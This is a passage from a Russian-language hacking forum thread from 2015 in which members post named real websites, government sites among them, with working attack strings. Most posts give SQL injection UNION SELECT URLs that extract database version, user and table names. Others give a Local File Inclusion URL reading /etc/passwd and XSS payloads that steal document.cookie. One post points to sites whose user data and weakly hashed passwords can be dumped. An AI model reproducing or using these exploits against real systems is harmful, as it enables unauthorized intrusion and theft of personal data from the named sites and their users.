HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #71  
Старый 13.08.2015, 16:19
comstream
Guest
Сообщений: n/a
Провел на форуме:
10697

Репутация: 0
По умолчанию

Site: cc-comics.pl

Уязвимость: Local File Inclusion

Эксплоит:

Код:
Code:
http://cc-comics.pl/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=/etc/passwd
Site: www.ctpart.com

Уязвимость: Local File Inclusion

Код:
Code:
http://www.ctpart.com/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=/etc/passwd
 
Ответить с цитированием

  #72  
Старый 20.08.2015, 19:15
comstream
Guest
Сообщений: n/a
Провел на форуме:
10697

Репутация: 0
По умолчанию

Сайт : http://astana.gov.kz

Уязвимость: XSS

Эксплоит: http://astana.gov.kz/en/resetting/request

В поле

Username or email address:

Post запрос: alert(document.cookie);
 
Ответить с цитированием

  #73  
Старый 07.09.2015, 23:45
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Цитата:
Сообщение от joelblack  
joelblack said:

target: http://www.cymbeline.com

type: SQL Injection

version: 5.1.73

user: cymbeline@localhost

Код:
Code:
http://www.cymbeline.com/fr_FR/news/actualite.php5?id=-147+union+select+1,2,table_name,version(),5,6,7,8,9,10,11,12,13,14+from+information_schema.tables+limit+3,1+--+
target: http://igamer.su

type: SQL Injection

version: 5.1.73

user: db_user_igamer@localhost


Код:
Code:
http://igamer.su/news.php?id=-11+union+select+1,table_name,3,4,5+from+information_schema.tables+limit+3,1+--+
target: http://www.kirpichi.kz

type: SQL Injection

version: 5.5.44-cll-lve

user: V_8337_KIRPICH@LOCALHOST

Код:
Code:
http://www.kirpichi.kz/?id=-7+union+select+1,2,version(),user(),5,table_name,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+information_schema.tables+limit+3,1+--+&show=calc
[COLOR="rgb(255, 153, 153)"]target:[/COLOR] http://www.qbele.com.br

[COLOR="rgb(255, 153, 153)"]type:[/COLOR] SQL Injection

[COLOR="rgb(255, 153, 153)"]version:[/COLOR] 5.1.73-rel14.11-log

[COLOR="rgb(255, 153, 153)"]user:[/COLOR] site1371378569@186.202.153.159

Код:
Code:
http://www.qbele.com.br/index.php?id=-989'+union+select+1,2,3,4,5,6,version(),8,9,user(),table_name,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57+from+information_schema.tables+limit+3,1+--+&qCid=Todas

Цитата:
Сообщение от blud_niy  
blud_niy said:

Site:
http://www.gorodokboxing.com
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.gorodokboxing.com/material.php?id=-2'+union+select+1,user(),3,4+--+
Site:
http://www.malnaditimudigere.com
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.malnaditimudigere.com/view_post.php?id=-2'+union+select+1,2,3,user(),version(),6,7,8,9+--+
Site:
http://glamdring.baac.or.th
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://glamdring.baac.or.th/tourism/preview.php?id=-7963'+union+select+1,version(),3,4,5,6,7,8+--+
Site:
http://web-sayansk.net
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://web-sayansk.net/view_games.php?id=-6'+union+select+1,2,3,4,user()+--+
Site:
http://www.replacement-windows.com
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.replacement-windows.com/window-board/read.php?id=-9960'+union+select+1,2,3,4,version(),6,table_name,8,9,10,user(),12,13,14,15,16,17,18,19+from+information_schema.tables+limit+1,1+--+
Site:
http://www.bellebuddy.com
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.bellebuddy.com/viewproduct.php?id=-311'+union+select+1,version(),user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+--+
Site:
http://www.babilon-nyelvstudio.hu
Уязвимость: SQL Injection
Эксплоит:
Код:
Code:
http://www.babilon-nyelvstudio.hu/page.php?id=-305'+union+select+1,2,3,4,5,6,version(),user(),table_name,10,11,12,13,14,15,16+from+information_schema.tables+limit+3,1+--+
Цитата:
Сообщение от comstream  
comstream said:

Site:
cc-comics.pl
Уязвимость:
Local File Inclusion
Эксплоит:
Код:
Code:
http://cc-comics.pl/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=/etc/passwd
Site:
www.ctpart.com

Уязвимость: Local File Inclusion

Код:
Code:
http://www.ctpart.com/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=/etc/passwd
Цитата:
Сообщение от comstream  
comstream said:

Сайт :
http://astana.gov.kz
Уязвимость: XSS
Эксплоит:
http://astana.gov.kz/en/resetting/request
В поле
Username or email address:
Post запрос: alert(document.cookie);
добавил
 
Ответить с цитированием

  #74  
Старый 10.09.2015, 12:11
comstream
Guest
Сообщений: n/a
Провел на форуме:
10697

Репутация: 0
По умолчанию

Сайт : http://mod.gov.kz

Уязвимость: XSS

Эксплоит:

Код:
Code:
mod.gov.kz/kaz/akciya_k_70yu_letiyu/foto_akciya'"()%26%25alert(document.cookie)/
 
Ответить с цитированием

  #75  
Старый 10.09.2015, 23:54
Metal-Core
Guest
Сообщений: n/a
Провел на форуме:
37221

Репутация: 0
По умолчанию

Сайт : http://4rpg.net/buy2.php?game=lineag...erver=Shillien

Уязвимость: XSS

Эксплоит: http://4rpg.net/buy3.php

Поля

"E-mail", "Ник в игре", "Комментарии" :

Post запрос: 'alert('satanic')
 
Ответить с цитированием

  #76  
Старый 11.09.2015, 13:41
Strannik1236
Guest
Сообщений: n/a
Провел на форуме:
3668

Репутация: 0
По умолчанию

Сколько уязвимостей надо найти и что получит победитель?
 
Ответить с цитированием

  #77  
Старый 11.09.2015, 22:22
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Цитата:
Сообщение от Strannik1236  
Strannik1236 said:

Сколько уязвимостей надо найти и что получит победитель?
перечитайте первое сообщение
 
Ответить с цитированием

  #78  
Старый 13.09.2015, 08:34
blud_niy
Guest
Сообщений: n/a
Провел на форуме:
1923

Репутация: 0
По умолчанию

Site: thewhole9.com

Уязвимость: SQL Injection

Эксплоит:

Код:
Code:
http://www.thewhole9.com/event_read.php?id=-2594'+union+select+1,2,version(),4,5,6,7,8,9,user(),table_name,12,13,14,15,16,17+from+information_schema.tables+limit+3,1+--+
Site: domainefoivos.com

Уязвимость: SQL Injection

Эксплоит:

Код:
Code:
http://www.domainefoivos.com/news-read.php?id=-10'+union+select+1,version(),3,4,5,table_name,7,8,9,10+from+information_schema.tables+limit+3,1+--+
Site: zupa.pregrada.hr

Уязвимость: SQL Injection

Эксплоит:

Код:
Code:
http://www.zupa.pregrada.hr/story.php?id=-276'+union+select+1,version(),3,4,user(),6+--+
Site: obfzgalanta.sk

Уязвимость: SQL Injection

Эксплоит:

Код:
Code:
http://obfzgalanta.sk/uniweb/article.php?id=-2719'+union+select+1,version(),3,table_name,user()+from+information_schema.tables+limit+3,1+--+
Site: obfztopolcany.sk

Уязвимость: SQL Injection

Эксплоит:

Код:
Code:
http://www.obfztopolcany.sk/uniweb/article.php?id=-3178'+union+select+1,version(),3,table_name,user()+from+information_schema.tables+limit+3,1+--+
Site: letzzep.com

Уязвимость: SQL Injection

Эксплоит:

Код:
Code:
http://www.letzzep.com/reviewpop.php?id=-30'+union+select+1,table_name,3,4,5,user(),version(),8+from+information_schema.tables+limit+3,1+--+
Site: agrovolyn.com

Уязвимость: SQL Injection

Эксплоит:

Код:
Code:
http://agrovolyn.com/news.php?id=-657'+union+select+1,version(),table_name,4,5,6,user()+from+information_schema.tables+limit+3,1+--+
Site: siempreenplay.com

Уязвимость: SQL Injection

Эксплоит:

Код:
Code:
http://www.siempreenplay.com/EstudiosCientificos_post.php?id=-16'+union+select+1,2,3,4,5,table_name,7,8,9,10+from+information_schema.tables+limit+3,1+--+
Site: kmbajwa.com

Уязвимость: SQL Injection

Эксплоит:

Код:
Code:
http://kmbajwa.com/page.php?id=-9'+union+select+1,version(),table_name+from+information_schema.tables+limit+4,1+--+
Site: bhajanawali.com

Уязвимость: SQL Injection

Эксплоит:

Код:
Code:
http://www.bhajanawali.com/reading-den/read.php?id=-10'+union+select+1,table_name,3,4+from+information_schema.tables+limit+4,1+--+
 
Ответить с цитированием

  #79  
Старый 22.09.2015, 00:53
ubepkr
Guest
Сообщений: n/a
Провел на форуме:
32618

Репутация: 1
По умолчанию

Всем привет!

В ручную пока не особо получается раскручивать, посему не вините))

http://www.24open-casino.com//index....ll=playtech&p= - интернет-казино, на сайте вообще куча косяков с SQLi и XSS, база элементарно вытаскивается, пароли в MD5, куча личной инфы по пользователям.

http://www.fortunataptr.pl/scripts/runner.php?GA= - мыла с акками, пароли в MD5 (SQLi);

http://www.frisbyracetire.net/showproducts.php?catid=2&subcatid= - пароли без шифрования (SQLi);

http://www.yickyak.net/categories.php?catid= - пароли в MD5 (SQLi);

http://www.beavercreekrental.net/RentalCategoryDetails.asp?category_id= - пароли без шифрования (SQLi).
 
Ответить с цитированием

  #80  
Старый 30.09.2015, 13:41
Diadlo
Guest
Сообщений: n/a
Провел на форуме:
5931

Репутация: 0
По умолчанию

Сайт: www.metal-rules.com

Уязвимость: SQL Injection

Эксплоит:

Код:
Code:
http://www.metal-rules.com/polls/index.php?id=-1%27+UNION+SELECT+1,user(),3,version()+--+
Заодно прошу подсказки. Это я упорот или там нет таблицы с пользователями?
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ